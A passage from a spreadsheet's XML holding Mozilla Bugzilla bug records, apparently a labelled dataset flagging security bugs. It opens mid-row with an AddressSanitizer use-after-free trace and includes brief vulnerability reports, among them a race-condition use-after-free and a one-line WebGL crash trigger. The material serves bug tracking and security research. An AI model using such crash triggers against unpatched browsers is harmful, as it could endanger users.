    #17 0x7f8e79d3fc7d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #18 0x7f8e738c8bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #19 0x7f8e742f930a in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #20 0x7f8e742f930a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #21 0x7f8e742c36ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #22 0x7f8e742c50d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #23 0x7f8e742afe36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #24 0x7f8e742b34c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #25 0x7f8e764ab21c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1047:7
    #26 0x7f8e7725008b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7638:5
    #27 0x7f8e7724be94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7442:7
    #28 0x7f8e772534ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7339:13
    #29 0x7f8e713dcdc0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #30 0x7f8e713dbd58 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #31 0x7f8e713d8ab8 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #32 0x7f8e713dabb4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #33 0x7f8e713db76c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #34 0x7f8e6f92c6ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c2a800e69e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a800e69f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a800e6a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a800e6a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a800e6a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c2a800e6a30: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x0c2a800e6a40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800e6a50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800e6a60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c2a800e6a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a800e6a8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018==ABORTING</t>
        </is>
      </c>
      <c r="X5948" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5949">
      <c r="A5949" t="n">
        <v>685299</v>
      </c>
      <c r="B5949" t="inlineStr">
        <is>
          <t>2011-09-07 13:55:18 -0700</t>
        </is>
      </c>
      <c r="C5949" t="inlineStr">
        <is>
          <t>Need ftp log uploading for projects, Valgrind and SpiderMonkey builds</t>
        </is>
      </c>
      <c r="D5949" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5949" t="n">
        <v>1</v>
      </c>
      <c r="F5949" t="n">
        <v>1</v>
      </c>
      <c r="G5949" t="n">
        <v>5</v>
      </c>
      <c r="H5949" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5949" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5949" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5949" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5949" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5949" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5949" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5949" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5949" t="inlineStr">
        <is>
          <t>[automation][ftp][database][projects][logs]</t>
        </is>
      </c>
      <c r="Q5949" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5949" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5949" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5949" t="n">
        <v>1</v>
      </c>
      <c r="U5949" t="n">
        <v>0</v>
      </c>
      <c r="V5949" t="n">
        <v>8</v>
      </c>
      <c r="W5949" t="inlineStr">
        <is>
          <t>Log uploading for projects will be important for getting away from Tinderbox.  This has come up in Jetpack error log parsing but it would be great to get this for any and all projects.  Here's a list of what is needed to get this happening (until a blob store comes along):
- set an ftp_url &amp; path in configs for each project*
- append a status/log_handler to the generateProjectObjects buildOjects['status'] that can handle log uploads
- create a unique ID for each project build and set it as a property - use this for uploading and insert into db with builder results
- log_uploader and post_upload need to be taught about projects
- tbpl integration (handwaving here, not sure what's involved)
* anything that's it's own project should have it's own dir on ftp (Spidermonkey, Nanojit, Jetpack) but need to accommodate a project working on different branches.</t>
        </is>
      </c>
      <c r="X5949" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5950">
      <c r="A5950" t="n">
        <v>283460</v>
      </c>
      <c r="B5950" t="inlineStr">
        <is>
          <t>2005-02-24 05:20:07 -0800</t>
        </is>
      </c>
      <c r="C5950" t="inlineStr">
        <is>
          <t>Clean up internal links on LDAP C SDK documentation</t>
        </is>
      </c>
      <c r="D5950" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E5950" t="n">
        <v>1</v>
      </c>
      <c r="F5950" t="n">
        <v>1</v>
      </c>
      <c r="G5950" t="n">
        <v>5</v>
      </c>
      <c r="H5950" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5950" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J5950" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5950" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5950" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5950" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5950" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5950" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5950" t="inlineStr"/>
      <c r="Q5950" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5950" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S5950" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5950" t="n">
        <v>1</v>
      </c>
      <c r="U5950" t="n">
        <v>0</v>
      </c>
      <c r="V5950" t="n">
        <v>20</v>
      </c>
      <c r="W5950" t="inlineStr">
        <is>
          <t>As said in bug 274417 comment 1 we should replace the internal links, which use
a numbering scheme of xyz.html#1002345, with a more sensible naming scheme.
Some work was already done for this on Chapter 6 of the LDAP C SDK documentation
(see http://www.mozilla.org/directory/csdk-docs/controls.htm) but more work is
needed.</t>
        </is>
      </c>
      <c r="X5950" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5951">
      <c r="A5951" t="n">
        <v>2717</v>
      </c>
      <c r="B5951" t="inlineStr">
        <is>
          <t>1999-01-27 14:51:11 -0800</t>
        </is>
      </c>
      <c r="C5951" t="inlineStr">
        <is>
          <t>[PP] Open doesn't bring up File dialog</t>
        </is>
      </c>
      <c r="D5951" t="inlineStr">
        <is>
          <t>2008-07-31 01:15:51 -0700</t>
        </is>
      </c>
      <c r="E5951" t="n">
        <v>1</v>
      </c>
      <c r="F5951" t="n">
        <v>1</v>
      </c>
      <c r="G5951" t="n">
        <v>6</v>
      </c>
      <c r="H5951" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5951" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5951" t="inlineStr">
        <is>
          <t>Viewer App</t>
        </is>
      </c>
      <c r="K5951" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5951" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5951" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5951" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5951" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5951" t="inlineStr"/>
      <c r="Q5951" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5951" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5951" t="inlineStr">
        <is>
          <t>M3</t>
        </is>
      </c>
      <c r="T5951" t="n">
        <v>1</v>
      </c>
      <c r="U5951" t="n">
        <v>0</v>
      </c>
      <c r="V5951" t="n">
        <v>9</v>
      </c>
      <c r="W5951" t="inlineStr">
        <is>
          <t>using 1/27 build.
Launch client
Do File | Open
it brings up another browser window with all kinds of garbage in it.
Sometimes even crashes..
on Windows, it brings up the file dialog.</t>
        </is>
      </c>
      <c r="X5951" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5952">
      <c r="A5952" t="n">
        <v>1132342</v>
      </c>
      <c r="B5952" t="inlineStr">
        <is>
          <t>2015-02-11 20:42:40 -0800</t>
        </is>
      </c>
      <c r="C5952" t="inlineStr">
        <is>
          <t>race conditions in TrackBuffer::mInitializationPromise</t>
        </is>
      </c>
      <c r="D5952" t="inlineStr">
        <is>
          <t>2016-07-02 10:11:02 -0700</t>
        </is>
      </c>
      <c r="E5952" t="n">
        <v>1</v>
      </c>
      <c r="F5952" t="n">
        <v>1</v>
      </c>
      <c r="G5952" t="n">
        <v>3</v>
      </c>
      <c r="H5952" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5952" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5952" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5952" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L5952" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5952" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5952" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5952" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5952" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q5952" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5952" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5952" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T5952" t="n">
        <v>1</v>
      </c>
      <c r="U5952" t="n">
        <v>0</v>
      </c>
      <c r="V5952" t="n">
        <v>13</v>
      </c>
      <c r="W5952" t="inlineStr">
        <is>
          <t>AFAICS TrackBuffer::mInitializationPromise.RejectIfExists() may be called on
the main thread via SourceBuffer::Abort() while also being called on an
initialization task queue thread from InitializeDecoder().
This could lead to a null deref if MediaPromiseHolder::mPromise has been
cleared, or use-after-free calling Reject() or Release() on a deleted mPromise.
Perhaps the RejectIfExists() can be proxied to the main thread.</t>
        </is>
      </c>
      <c r="X5952" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5953">
      <c r="A5953" t="n">
        <v>673336</v>
      </c>
      <c r="B5953" t="inlineStr">
        <is>
          <t>2011-07-21 20:52:07 -0700</t>
        </is>
      </c>
      <c r="C5953" t="inlineStr">
        <is>
          <t>Investigate exceptions in Firefox 7 compatibility bump</t>
        </is>
      </c>
      <c r="D5953" t="inlineStr">
        <is>
          <t>2016-02-04 14:48:56 -0800</t>
        </is>
      </c>
      <c r="E5953" t="n">
        <v>1</v>
      </c>
      <c r="F5953" t="n">
        <v>1</v>
      </c>
      <c r="G5953" t="n">
        <v>6</v>
      </c>
      <c r="H5953" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5953" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J5953" t="inlineStr">
        <is>
          <t>Compatibility Tools</t>
        </is>
      </c>
      <c r="K5953" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5953" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5953" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5953" t="inlineStr"/>
      <c r="Q5953" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5953" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5953" t="inlineStr">
        <is>
          <t>6.1.7</t>
        </is>
      </c>
      <c r="T5953" t="n">
        <v>1</v>
      </c>
      <c r="U5953" t="n">
        <v>0</v>
      </c>
      <c r="V5953" t="n">
        <v>5</v>
      </c>
      <c r="W5953" t="inlineStr">
        <is>
          <t>I'm almost done with the validation runs for the Firefox 7 compatibility bump, and I'm getting a considerable exception count for some of them, with nothing in the Errors/Warnings logs to tell what's going on.
6.* -&gt; 7.* has 16 exceptions out of 3348 tested
6.0 -&gt; 7.* has 13 exceptions so far, and it is only about one third through.
Since I don't see any exceptions reported in the 5.* or 6.* runs, I'd rather hold off on the notification until these are investigated. If the exceptions are not a real concern, just let me know and I'll being notifying developers as soon as possible.</t>
        </is>
      </c>
      <c r="X5953" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5954">
      <c r="A5954" t="n">
        <v>778980</v>
      </c>
      <c r="B5954" t="inlineStr">
        <is>
          <t>2012-07-30 16:10:47 -0700</t>
        </is>
      </c>
      <c r="C5954" t="inlineStr">
        <is>
          <t>Enable gcc -Werror=conversion-null for gcc &gt;= 4.5</t>
        </is>
      </c>
      <c r="D5954" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E5954" t="n">
        <v>1</v>
      </c>
      <c r="F5954" t="n">
        <v>1</v>
      </c>
      <c r="G5954" t="n">
        <v>7</v>
      </c>
      <c r="H5954" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5954" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J5954" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5954" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5954" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5954" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5954" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5954" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5954" t="inlineStr"/>
      <c r="Q5954" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5954" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5954" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T5954" t="n">
        <v>1</v>
      </c>
      <c r="U5954" t="n">
        <v>0</v>
      </c>
      <c r="V5954" t="n">
        <v>29</v>
      </c>
      <c r="W5954" t="inlineStr">
        <is>
          <t>To make gcc's NULL/nullptr warnings fatal like clang's nullptr errors, we may want to add -Werror=conversion-null to Linux's CFLAGS/CXXFLAGS for gcc &gt;= 4.5. (The -Wconversion-null flag was new in gcc 4.5.)
If a developer overlooks these gcc warnings, then they may not realize their code change will break the OS X's clang build until they push to the tryserver. This a waste of developer time and tryserver resources.</t>
        </is>
      </c>
      <c r="X5954" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5955">
      <c r="A5955" t="n">
        <v>1248580</v>
      </c>
      <c r="B5955" t="inlineStr">
        <is>
          <t>2016-02-16 05:59:28 -0800</t>
        </is>
      </c>
      <c r="C5955" t="inlineStr">
        <is>
          <t>Crash in TSymbolTableLevel::~TSymbolTableLevel</t>
        </is>
      </c>
      <c r="D5955" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:34 -0700</t>
        </is>
      </c>
      <c r="E5955" t="n">
        <v>1</v>
      </c>
      <c r="F5955" t="n">
        <v>1</v>
      </c>
      <c r="G5955" t="n">
        <v>3</v>
      </c>
      <c r="H5955" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5955" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5955" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5955" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L5955" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5955" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5955" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5955" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5955" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+] gfx-noted</t>
        </is>
      </c>
      <c r="Q5955" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5955" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5955" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T5955" t="n">
        <v>1</v>
      </c>
      <c r="U5955" t="n">
        <v>0</v>
      </c>
      <c r="V5955" t="n">
        <v>53</v>
      </c>
      <c r="W5955" t="inlineStr">
        <is>
          <t>Created attachment 8719759
crash.html
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Build ID: 20160215030213
Steps to reproduce:
Open crash.html after a few seconds the browser will crash.
The reason for the crash is this line:
var kernelLocation = gl.getUniformLocation(program, "u_kernel[1]"); 
no crash with var kernelLocation = gl.getUniformLocation(program, "u_kernel[0]")
I submitted a crash report as well:
https://crash-stats.mozilla.com/report/index/bp-b8689516-af85-4a0d-87cb-998d92160216
Actual results:
Firefox crashed after 2-6 seconds
Expected results:
No Crash</t>
        </is>
      </c>
      <c r="X5955" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5956">
      <c r="A5956" t="n">
        <v>1483396</v>
      </c>
      <c r="B5956" t="inlineStr">
        <is>
          <t>2018-08-14 15:26:36 -0700</t>
        </is>
      </c>
      <c r="C5956" t="inlineStr">
        <is>
          <t>[Shield] Pref Flip: Search Shortcuts in Activity Stream, release 62</t>
        </is>
      </c>
      <c r="D5956" t="inlineStr">
        <is>
          <t>2019-01-28 08:43:12 -0800</t>
        </is>
      </c>
      <c r="E5956" t="n">
        <v>1</v>
      </c>
      <c r="F5956" t="n">
        <v>1</v>
      </c>
      <c r="G5956" t="n">
        <v>5</v>
      </c>
      <c r="H5956" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5956" t="inlineStr">
        <is>
          <t>Shield</t>
        </is>
      </c>
      <c r="J5956" t="inlineStr">
        <is>
          <t>Shield Study</t>
        </is>
      </c>
      <c r="K5956" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5956" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5956" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5956" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5956" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5956" t="inlineStr"/>
      <c r="Q5956" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5956" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5956" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5956" t="n">
        <v>1</v>
      </c>
      <c r="U5956" t="n">
        <v>0</v>
      </c>
      <c r="V5956" t="n">
        <v>21</v>
      </c>
      <c r="W5956" t="inlineStr">
        <is>
          <t>Basic description of experiment 1 (Filtering):
Remove  Alexa Top 5 search providers (Google, Yahoo, Bing, Ask, Duck Duck Go) from showing by default and organically in Top sites.  Additionally, remove the top site that corresponds to the default search engine  from the list of preloaded providers (Google, Bing, eBay, Wikipedia, Amazon, Twitter, Duck Duck Go).  
For example, if a user has Wikipedia set as their One-Click search engine in Firefox Preferences, Wikipedia and the Alexa top 5 search providers (Google, Yahoo, Bing, Ask, Duck Duck Go), will not show up in Top Sites by default and organically.
The logic for manually adding and pinning these top sites remains unchanged.
2.Basic description of experiment 2 (Search Shortcuts):
Search Shortcuts in Top Sites
Add @Amazon shortcut and @Google shortcut to all users. Once a shortcut is clicked on, the address bar gets focus and is ready to search the clicked-on source.
Note that the feature has already passed data and legal review (bug 1480513), has been code-reviewed by Firefox peers (:k88hudson :Mardak), is undergoing the usual QA oversight for Firefox features (:cmuresan), and does not require additional security review (as per :k88hudson and :Mardak).</t>
        </is>
      </c>
      <c r="X5956" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5957">
      <c r="A5957" t="n">
        <v>906558</v>
      </c>
      <c r="B5957" t="inlineStr">
        <is>
          <t>2013-08-18 21:35:27 -0700</t>
        </is>
      </c>
      <c r="C5957" t="inlineStr">
        <is>
          <t>[b2g][l10n][marketing][de]: masterfirefoxos.com for 1.1 release</t>
        </is>
      </c>
      <c r="D5957" t="inlineStr">
        <is>
          <t>2013-12-02 13:26:31 -0800</t>
        </is>
      </c>
      <c r="E5957" t="n">
        <v>1</v>
      </c>
      <c r="F5957" t="n">
        <v>1</v>
      </c>
      <c r="G5957" t="n">
        <v>2</v>
      </c>
      <c r="H5957" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5957" t="inlineStr">
        <is>
          <t>Mozilla Localizations</t>
        </is>
      </c>
      <c r="J5957" t="inlineStr">
        <is>
          <t>de / German</t>
        </is>
      </c>
      <c r="K5957" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5957" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5957" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N5957" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5957" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5957" t="inlineStr"/>
      <c r="Q5957" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5957" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5957" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5957" t="n">
        <v>1</v>
      </c>
      <c r="U5957" t="n">
        <v>0</v>
      </c>
      <c r="V5957" t="n">
        <v>37</v>
      </c>
      <c r="W5957" t="inlineStr">
        <is>
          <t>Created attachment 791987
kus13009_Script_Translation_Master-template-Wave2.doc
DE team chooses to localize the web/video content of masterfirefoxos.com.  This means, the localization tasks (excluding video/audio recording/mixing tasks) includes the following, and may not be limited to:
- localization of the "web" content - see the attached file - about 4000+ words
- localization of the "video" audio script - ~ 700 words  
- review and correction of website once the content is being staged
- screening voice talent (if you don't want to do it, let me know) prior to recording
- review of audio tracks with localized script
- review of mixing of video clips with localized audio
- review of the final website for your language and final signoff prior to product launch.
Timeline:
- there are lots of post production work involved after the initial translation
- each assembly and staging of content involves review and verification, some tasks have dependencies of another.
- web content localization is due on August 31
- video audio script is due on August 31
- other milestones yet to be mapped out
- site will be ready by end of Sept or early October.</t>
        </is>
      </c>
      <c r="X5957" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5958">
      <c r="A5958" t="n">
        <v>25161</v>
      </c>
      <c r="B5958" t="inlineStr">
        <is>
          <t>2000-01-26 18:40:56 -0800</t>
        </is>
      </c>
      <c r="C5958" t="inlineStr">
        <is>
          <t>Editor needs to handle editing pages with forms</t>
        </is>
      </c>
      <c r="D5958" t="inlineStr">
        <is>
          <t>2001-09-12 00:43:03 -0700</t>
        </is>
      </c>
      <c r="E5958" t="n">
        <v>1</v>
      </c>
      <c r="F5958" t="n">
        <v>1</v>
      </c>
      <c r="G5958" t="n">
        <v>3</v>
      </c>
      <c r="H5958" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5958" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5958" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K5958" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5958" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5958" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N5958" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5958" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5958" t="inlineStr">
        <is>
          <t>[nsbeta3+][p:1]</t>
        </is>
      </c>
      <c r="Q5958" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5958" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5958" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T5958" t="n">
        <v>1</v>
      </c>
      <c r="U5958" t="n">
        <v>1</v>
      </c>
      <c r="V5958" t="n">
        <v>31</v>
      </c>
      <c r="W5958" t="inlineStr">
        <is>
          <t>If you choose "edit link in new composer window" and the link that is opened in 
Editor has a text field, Editor lets you set focus to that text field, which 
gives a total of 2 carets.
The result is when you type, one character goes into the text field, and 
another 
goes to the "original" caret's position.
M13 Win32 build.</t>
        </is>
      </c>
      <c r="X5958" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5959">
      <c r="A5959" t="n">
        <v>538310</v>
      </c>
      <c r="B5959" t="inlineStr">
        <is>
          <t>2010-01-06 17:05:47 -0800</t>
        </is>
      </c>
      <c r="C5959" t="inlineStr">
        <is>
          <t>PluginArray nsMimeType Dangling Pointer Vulnerability (ZDI-CAN-655)</t>
        </is>
      </c>
      <c r="D5959" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5959" t="n">
        <v>1</v>
      </c>
      <c r="F5959" t="n">
        <v>1</v>
      </c>
      <c r="G5959" t="n">
        <v>6</v>
      </c>
      <c r="H5959" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
